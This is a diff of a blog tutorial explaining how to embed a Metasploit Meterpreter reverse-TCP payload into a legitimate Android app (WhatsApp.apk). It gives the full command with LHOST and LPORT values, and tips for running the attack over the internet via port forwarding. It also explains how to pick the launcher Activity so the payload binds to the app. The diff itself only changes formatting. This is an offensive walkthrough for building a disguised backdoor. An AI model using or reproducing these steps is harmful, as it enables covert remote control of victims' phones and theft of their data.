skulltech/sumit-ghosh.com/_posts/2015-12-11-embed-metasploit-payload-in-apk-easily.md

 $ ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
 ```

 In this example I’ve used 192.168.0.104 as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you.
-Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.
+Make sure to change it to the appropriate values, especially the IP, the `LPORT` can be set to any reasonable port no.

-_NOTE_ — If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option.
+_NOTE_.
+If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the `LHOST` option.
 You also may need to forward the port you’re using for this attack to work properly.

 Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process.
 But more than often it cannot determine to which Activity of the app it should bind the payload to, so it asks you to select it.
-In that case, leave the terminal open with the script at the prompt, and browse to /root/original.
+In that case, leave the terminal open with the script at the prompt, and browse to `/root/original`.

 Then open the `AndroidManifest.xml` file using any text editor you like and look for an `<activity>` tag which contains both the texts `.MAIN` and `.LAUNCHER`.
 When you find that tag, look for the `android:name` attribute of that tag and from there, note the name of that Activity.